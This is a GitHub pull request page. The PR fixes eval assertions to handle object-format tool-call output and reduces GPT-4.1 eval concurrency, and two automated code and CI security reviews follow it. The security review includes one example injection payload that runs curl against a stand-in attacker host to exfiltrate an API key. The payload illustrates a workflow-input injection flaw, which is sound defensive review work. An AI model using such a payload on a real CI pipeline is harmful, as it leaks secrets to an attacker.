Skip to content

fix: handle object output in eval assertions and reduce GPT-4.1 concurrency#1090

Merged
stack72 merged 1 commit intomainfrom
fix/eval-assertion-compat
Apr 4, 2026
Merged

fix: handle object output in eval assertions and reduce GPT-4.1 concurrency#1090
stack72 merged 1 commit intomainfrom
fix/eval-assertion-compat

Conversation

@stack72
Copy link
Copy Markdown
Contributor

@stack72 stack72 commented Apr 4, 2026

Summary

  • Fix eval assertions to handle both string and object output formats from promptfoo — Gemini returns tool calls as objects, not JSON strings, causing all assertions to fail (36.1% pass rate was a false negative; routing was correct but assertions couldn't detect it)
  • Fix [object Object] in failure log output by serializing object responses before slicing
  • Reduce GPT-4.1 eval concurrency from 20 to 5 to avoid 429 rate limiting

Test Plan

  • deno fmt --check passes
  • deno lint passes
  • Re-run multi-model eval workflow to verify Gemini pass rate improves and GPT-4.1 avoids rate limits

🤖 Generated with Claude Code

…1 concurrency

Promptfoo returns tool call output as objects (not JSON strings) for some
providers like Gemini. The JavaScript assertions now handle both string
and object output formats. Also reduces GPT-4.1 concurrency from 20 to 5
to avoid 429 rate limiting.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Copy link
Copy Markdown

@github-actions github-actions bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Code Review

Blocking Issues

None.

Suggestions

  1. parseInt(args.concurrency) in scripts/eval_skill_triggers_promptfoo.ts:142 doesn't guard against NaN (e.g., --concurrency foo). A quick if (isNaN(concurrency)) check with an error message would be more robust, though this is an internal CI tool with a sensible default so it's non-blocking.

Overall this is a clean, well-scoped fix. The assertion logic correctly handles both string and object output formats from different model providers, the [object Object] log fix is straightforward, and the per-model concurrency in the workflow matrix is a good approach to rate limit management.

Copy link
Copy Markdown

@github-actions github-actions bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

CI Security Review

Critical / High

None.

Medium

  1. Pre-existing: Expression injection in multi-model-eval.yml:36-37${{ github.event.inputs.models || 'all' }} is interpolated directly in a run: block. A repo collaborator could inject shell commands via the workflow_dispatch input (e.g., "; curl attacker.com/exfil?key=$ANTHROPIC_API_KEY #). This is pre-existing and NOT introduced by this PR, but worth noting. Fix: pass the input via an env: variable instead of inline interpolation.

  2. denoland/setup-deno@v2 not SHA-pinned (multi-model-eval.yml:49) — Pre-existing. The Deno team is a trusted publisher, but SHA-pinning third-party actions is best practice for supply chain security.

Low

None.

Verdict

PASS — The changes in this PR are security-neutral. They add per-model concurrency to the matrix (hardcoded integer values, no injection risk) and fix eval assertion logic in TypeScript files that don't affect CI security posture. The two medium findings are pre-existing and not introduced by this diff.

@stack72 stack72 merged commit b0eb70c into main Apr 4, 2026
11 checks passed
@stack72 stack72 deleted the fix/eval-assertion-compat branch April 4, 2026 01:52
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant